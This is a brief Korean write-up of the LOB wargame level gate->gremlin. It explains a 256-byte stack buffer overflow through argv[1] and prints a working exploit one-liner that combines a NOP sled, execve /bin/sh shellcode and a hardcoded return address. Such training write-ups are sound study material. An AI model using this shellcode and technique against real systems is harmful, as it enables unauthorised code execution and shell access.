LOB gate->gremlin

lob는 시작하면 bash2로 해야 정상적으로 쉘코드를 넣을 수 있다.

설명대로 간단한 bof예제이다.

256크기의 버퍼에 argv[1]을 복사한다.

gdb로 보면 esp에 0x100(256)만큼 크기를 할당하고 dummy는 없다.

따라서 256 + SFP + RET 이런 스택구조를 가진다.

\x90을 264개 채워서 진행을 해보면 ret까지 딱 덮히는 것을 볼 수 있다.

exploit code 

`python -c 'print "\x90" * 176 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + 

"\x90" * 59 + 

"\x01\xfb\xff\xbf" ' `

성공